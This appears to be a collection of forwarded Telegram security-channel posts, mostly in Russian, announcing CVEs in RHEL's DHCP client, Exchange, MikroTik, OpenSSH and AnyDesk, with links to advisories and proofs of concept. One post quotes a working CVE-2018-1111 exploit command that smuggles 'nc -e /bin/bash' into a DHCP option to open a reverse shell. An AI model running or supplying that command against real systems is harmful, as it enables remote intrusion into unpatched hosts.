Forwarded from Cybershit
RCE в DHCP клиенте RHEL 6 и 7 версий, например, с блатным номерком - CVE-2018-1111
Info - https://access.redhat.com/security/vulnerabilities/3442151
PoC - https://twitter.com/Barknkilic/status/996470756283486209
Info - https://access.redhat.com/security/vulnerabilities/3442151
PoC - https://twitter.com/Barknkilic/status/996470756283486209
X (formerly Twitter)
Barkın Kılıç (@Barknkilic) on X
#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337…
Forwarded from Волосатый бублик
#article #cve #exchange
Microsoft Exchange Remote Code Execution -
CVE-2020-16875 Protection/Filter Bypass
https://www.x41-dsec.de/security/advisory/exploit/research/2020/12/21/x41-microsoft-exchange-rce-dlp-bypass/
Microsoft Exchange Remote Code Execution -
CVE-2020-16875 Protection/Filter Bypass
https://www.x41-dsec.de/security/advisory/exploit/research/2020/12/21/x41-microsoft-exchange-rce-dlp-bypass/
X41 D-Sec
Microsoft Exchange Remote Code Execution - CVE-2020-16875
The patch for CVE-2020-16875 in Microsoft Exchange can bypassed to gain remote code execution again.
Forwarded from @Leakinfo
📰 ProxyLogon - как работает уязвимость в Microsoft Exchange Server и как ее используют хакеры
https://telegra.ph/ProxyLogon-Kak-rabotaet-uyazvimost-v-Microsoft-Exchange-Server-i-kak-ee-ispolzuyut-hakery-04-01-2
#pentest #уязвимость #ProxyLogon #Exchange #Microsoft #Server #CVE
https://telegra.ph/ProxyLogon-Kak-rabotaet-uyazvimost-v-Microsoft-Exchange-Server-i-kak-ee-ispolzuyut-hakery-04-01-2
#pentest #уязвимость #ProxyLogon #Exchange #Microsoft #Server #CVE
Telegraph
ProxyLogon - как работает уязвимость в Microsoft Exchange Server и как ее используют хакеры
Содержание Что произошло? Расследование Последствия Неуязвимых программ не бывает — эта истина известна каждому. Но когда злоумышленники отыскивают в каком‑нибудь софте уязвимости нулевого дня, начинается веселье: и для пользователей,…
Forwarded from 0•Bytes•1
Я наконец то дописала большую статью про безопасность линукс на русском.
#vpn #linux #tor #i2p #mac #decentralization #cryptography #cve #dos #еtthernet #anonymity #attackers
Материал для моих англоязычных читателей выйдет чуть позжеI finally wrote a long article about Linux security.
Material for my English-speaking readers will be released a little later
Приятного прочтения❤️#vpn #linux #tor #i2p #mac #decentralization #cryptography #cve #dos #еtthernet #anonymity #attackers
Medium
Приватный линукс в норе
Добрый день мои Кролики🐰
Forwarded from Волосатый бублик
#mikrotik #cve
Remote and authenticated attackers can use the vulnerability to get a root shell on the router. (CVE-2023-30799)
https://vulncheck.com/blog/mikrotik-foisted-revisited
Remote and authenticated attackers can use the vulnerability to get a root shell on the router. (CVE-2023-30799)
https://vulncheck.com/blog/mikrotik-foisted-revisited
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Чекер виндовых CVE
https://github.com/BC-SECURITY/Moriarty
#exploit #cve #pentest #redteam #ad
https://github.com/BC-SECURITY/Moriarty
* Windows 10 (1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004, 20H2, 21H1, 21H2, 22H2)
* Windows 11 (21H2, 22H2)
* Windows Server 2016, 20 19, 2022
#exploit #cve #pentest #redteam #ad
GitHub
GitHub - BC-SECURITY/Moriarty: Moriarty is designed to enumerate missing KBs, detect various vulnerabilities, and suggest potential…
Moriarty is designed to enumerate missing KBs, detect various vulnerabilities, and suggest potential exploits for Privilege Escalation in Windows environments. - GitHub - BC-SECURITY/Moriarty: Mor...
Forwarded from APT
The Qualys Threat Research Unit has discovered a Remote Unauthenticated Code Execution vulnerability in OpenSSH’s server (sshd) in glibc-based Linux systems. CVE assigned to this vulnerability is CVE-2024-6387.
The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows unauthenticated remote code execution (RCE) as root on glibc-based Linux systems.
🔗 Research:
https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server
🔗 PoC:
https://github.com/7etsuo/cve-2024-6387-poc
#openssh #glibc #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from APT
🖼 AnyDesk — Local Privilege Escalation (CVE-2024-12754)
A vulnerability in AnyDesk allows low-privileged users to perform arbitrary file read and copy operations with NT AUTHORITY\SYSTEM privileges. Exploitation is possible by manipulating the background image, creating symbolic links, and leveraging ShadowCopy, granting access to SAM, SYSTEM, and SECURITY files, ultimately leading to privilege escalation to administrator.
🔗 Source:
https://mansk1es.gitbook.io/AnyDesk_CVE-2024-12754
#windows #anydesk #lpe #cve
A vulnerability in AnyDesk allows low-privileged users to perform arbitrary file read and copy operations with NT AUTHORITY\SYSTEM privileges. Exploitation is possible by manipulating the background image, creating symbolic links, and leveraging ShadowCopy, granting access to SAM, SYSTEM, and SECURITY files, ultimately leading to privilege escalation to administrator.
🔗 Source:
https://mansk1es.gitbook.io/AnyDesk_CVE-2024-12754
#windows #anydesk #lpe #cve
👍3